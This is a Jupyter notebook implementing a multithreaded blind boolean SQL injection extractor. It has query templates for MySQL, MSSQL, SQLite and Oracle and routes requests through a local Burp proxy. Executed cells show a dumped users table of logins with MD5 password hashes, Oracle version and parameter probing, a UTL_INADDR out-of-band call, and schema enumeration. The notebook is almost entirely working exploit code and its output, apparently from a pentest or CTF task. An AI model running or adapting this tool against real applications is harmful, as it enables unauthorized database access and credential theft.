In [110]:
import requests
#from requests_ntlm import HttpNtlmAuth
import json
from concurrent.futures import ThreadPoolExecutor
import threading
from threading import current_thread
from tqdm import tqdm_notebook
import re
import os

You have to just define:
1. Url with %s where to inject strings ' and 1=1 ' and ' and 1=0 ' and they work
2. response true_or false in get_bool
3. Multithreading options

In [2]:
from urllib.parse import urlencode, quote_plus

payload = {'username':'administrator', 'password':'xyz'}
result = urlencode(payload, quote_via=quote_plus)
result

'username=administrator&password=xyz'

In [3]:
multithreaded = True
threads = 16


In [16]:
http_proxy   = "http://localhost:8080"

proxyDict = { 
             "https"   : http_proxy,    
             "http"   : http_proxy
            }


In [233]:
threadLocal = None

def make_request(to_paste):

    burp0_cookies = {"JSESSIONID": cookie}
    burp0_url = "http://xxxx"
    burp0_headers = {}
    burp0_data = {"xxx":"fefe:%s"%to_paste}
    r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, proxies=proxyDict)

    return r


In [191]:

def get_bool(sql):
    while True:
        to_paste = sql
        r = make_request(to_paste)
        #print (r.text)

        if r.status_code != 200:
            raise Exception('code: %d, ошибка sql: %s'%(r.status_code,sql))
        if "You can't access information about" not in r.text:
            raise Exception('code: %d, ошибка sql: %s'%(r.status_code,sql))
        if "You can't access information about test" in r.text:
            return True
        else:
            return False

In [179]:
#for check
print (get_bool('1=1'))
print (get_bool('1=0'))

True
False


In [25]:
DBMS = 'oracle' #'mssql')

In [54]:
#MySQL
if DBMS == 'mysql':
    base_from_clause = 'FROM {table_name} {where} ORDER BY {column_name} limit 1 offset {row_num}'
    string_definition = 'SELECT %s'
    string_len_definition = 'SELECT length(%s)'
    string_char_definition = 'SELECT ASCII(SUBSTRING(%s,%d,1))'
    count_definition = 'SELECT count(*) FROM (SELECT * FROM %s %s)T'
    offset_shift=0

#MSSQL
if DBMS == 'mssql':
    base_from_clause = 'FROM (SELECT *, ROW_NUMBER() OVER(ORDER by [{column_name}])n FROM {table_name} {where})T WHERE n={row_num}'
    string_definition = 'SELECT %s'
    string_len_definition = 'SELECT len(%s)'
    string_char_definition = 'SELECT ASCII(SUBSTRING(%s,%d,1))'
    count_definition = 'SELECT count(*) FROM (SELECT * FROM %s %s)T'
    offset_shift=1
 
#SQLITE
if DBMS == 'sqlite':
    base_from_clause = 'FROM {table_name} {where} ORDER BY {column_name} limit 1 offset {row_num}'
    string_definition = 'SELECT %s'
    string_len_definition = 'SELECT length(%s)'
    #string_char_definition = 'SELECT unicode(SUBSTR(%s,%d,1))' #unicode doesn't work always
    string_char_definition = 'SELECT hex(SUBSTR(%s,%d,1))'
    count_definition = 'SELECT count(*) FROM (SELECT * FROM %s %s)T'
    offset_shift=0
    
#oracle
if DBMS == 'oracle':
    base_from_clause = 'FROM (SELECT a.*, ROWNUM rn FROM {table_name} a {where} ORDER BY a.{column_name}) WHERE rn={row_num}'
    string_definition = 'SELECT %s'
    string_len_definition = 'SELECT LENGTH(%s)'
    string_char_definition = 'SELECT ASCII(SUBSTR(%s,%d,1))'
    count_definition = 'SELECT count(*) FROM (SELECT * FROM %s %s)T'
    offset_shift=1

In [27]:
def define_string(table_name,column_name,index):
    return string_definition%(column_name) + ' ' + get_from_clause(table_name,column_name,index)

def get_from_clause(table_name,column_name,index,where=None):
    to_where = ''
    if where != None:
        to_where = 'WHERE '+where
    return base_from_clause.format(column_name = column_name,table_name = table_name,where = to_where,row_num = index)

def define_string_len(table_name,column_name,index,where=None):
    return string_len_definition%(column_name)+ ' ' + get_from_clause(table_name,column_name,index,where)

def define_string_char(table_name,column_name,index,string_pos,where=None):
    return string_char_definition%(column_name,string_pos) + ' ' + get_from_clause(table_name,column_name,index,where)

def define_count(table_name,where=None):
    to_where = ''
    if where != None:
        to_where = 'WHERE '+where
    return count_definition%(table_name,to_where)

def build_sql_binary_query(query,value,search_for_number):
    if (DBMS == 'sqlite') and (search_for_number==False):
        return "(%s)>=hex(char(%s))" % (query,value) #this is cause ' was banned in task, but works always
    else:
        return '(%s)>=%d' %(query,value)

def binary_search(s,start_val,start_val_defined=False,search_for_number=False): #start_val should be power of 2
    #define real_start_val:
    if not start_val_defined:
        while True:
            sql = build_sql_binary_query(s,start_val-1,search_for_number)
            #print sql
            r = get_bool(sql)
            if r:
                start_val*=8
            else:
                break
    #now start_val > len
    cur_val = start_val/2
    move = start_val/4
    while True:
        sql = build_sql_binary_query(s,cur_val,search_for_number)
        #print sql
        r = get_bool(sql)
        #print r
        if move<1:
            if r:
                return int(cur_val)
            else:
                return int(cur_val-1)
        if r: #(cur_val+1 - cur_val+2*move)
            cur_val+=move
        else:
            cur_val-=move
        move = move/2
    

def get_from_clause(table_name,column_name,index,where=None):
    to_where = ''
    if where != None:
        to_where = 'WHERE '+where
    return base_from_clause.format(column_name = column_name,table_name = table_name,where = to_where,row_num = index)

def define_string_len(table_name,column_name,index,where=None):
    return string_len_definition%(column_name)+ ' ' + get_from_clause(table_name,column_name,index,where)

def define_string_char(table_name,column_name,index,string_pos,where=None):
    return string_char_definition%(column_name,string_pos) + ' ' + get_from_clause(table_name,column_name,index,where)

def define_count(table_name,where=None):
    to_where = ''
    if where != None:
        to_where = 'WHERE '+where
    return count_definition%(table_name,to_where)

def build_sql_binary_query(query,value,search_for_number):
    if (DBMS == 'sqlite') and (search_for_number==False):
        return "(%s)>=hex(char(%s))" % (query,value) #this is cause ' was banned in task, but works always
    else:
        return '(%s)>=%d' %(query,value)

def binary_search(s,start_val,start_val_defined=False,search_for_number=False): #start_val should be power of 2
    #define real_start_val:
    if not start_val_defined:
        while True:
            sql = build_sql_binary_query(s,start_val-1,search_for_number)
            #print sql
            r = get_bool(sql)
            if r:
                start_val*=8
            else:
                break
    #now start_val > len
    cur_val = start_val/2
    move = start_val/4
    while True:
        sql = build_sql_binary_query(s,cur_val,search_for_number)
        #print sql
        r = get_bool(sql)
        #print r
        if move<1:
            if r:
                return int(cur_val)
            else:
                return int(cur_val-1)
        if r: #(cur_val+1 - cur_val+2*move)
            cur_val+=move
        else:
            cur_val-=move
        move = move/2
    

In [156]:
def get_count(table_name,where=None):
    s = define_count(table_name,where)
    return binary_search(s,32,False,True)
    

def get_length_of_string(table_name,column_name,index,where=None):  
    s = define_string_len(table_name,column_name,index,where)
    return binary_search(s,32,False,True)

def get_char(table_name,column_name,index,str_pos,where=None):
    s = define_string_char(table_name,column_name,index,str_pos,where)
    return chr(binary_search(s,256,True))

def get_char_for_pool(chunk):
    return get_char(*chunk)

def get_string(table_name,column_name,index,where=None):
    l = get_length_of_string(table_name,column_name,index,where)
    print ('length: %d' % l)
    r = ''
    if not multithreaded:
        for i in range(l):
            r+=get_char(table_name,column_name,index,i+1,where)
            #print r
        return r
    else:
        with ThreadPoolExecutor(max_workers=threads) as pool:
            r = ''.join(list(pool.map(get_char_for_pool,[(table_name,column_name,index,i+1,where) for i in range(l)])))
            return r


In [239]:
%%time
threads=16
multithreaded=True
print (get_count('v$version',where="1=1"))

5
CPU times: user 22.5 ms, sys: 5.96 ms, total: 28.5 ms
Wall time: 846 ms


In [242]:
%%time
threads=16
multithreaded=True
threadLocal = threading.local()
print (get_string("UTL_INADDR.get_host_address('xxx')",'dual',1))

length: 0

CPU times: user 26.1 ms, sys: 4.88 ms, total: 31 ms
Wall time: 910 ms


In [234]:
%%time
threads=32
multithreaded=True
threadLocal = threading.local()
print (get(['value'],'v$parameter2',where="name = 'utl_file_dir'")) 

count 0
[]
CPU times: user 28.8 ms, sys: 17.2 ms, total: 45.9 ms
Wall time: 1.1 s


In [132]:
def get(columns,table_name,where=None):
    count = get_count(table_name,where)
    print ('count %d' % count)
    res = []
    for i in range(count):
        cs = []
        for column in columns:
            cs.append(get_string(table_name,column,i+offset_shift,where))
        print (cs)
        res.append(cs)
    return res

In [92]:
get(['login','pass'],'users')

[['a', '098f6bcd4621d373cade4e832627b4f6'],
 ['admin', '0d63031864eaeeab8baf66bee4e9c3b9'],
 ['cth', '202cb962ac59075b964b07152d234b70'],
 ['test', '3590cb8af0bbb9e78c343b52b93773c9'],
 ['testtest', '60ac7bc37d05b4dbac42ebffd9e76a74']]

In [ ]:
columns = {}
for t in tables:
    t = t[0]
    r = get(['column_name'],'information_schema.columns',"table_name='%s'"%t)
    columns[t]=r

In [ ]:
userTab = get(['FIO','UserName'],'temp_User')

In [ ]:
get_count('sysobjects')

In [ ]:
all_tables = get(['name'],'sysobjects')

In [ ]:
print get_string('temp_User','UserName',1).decode('cp1251')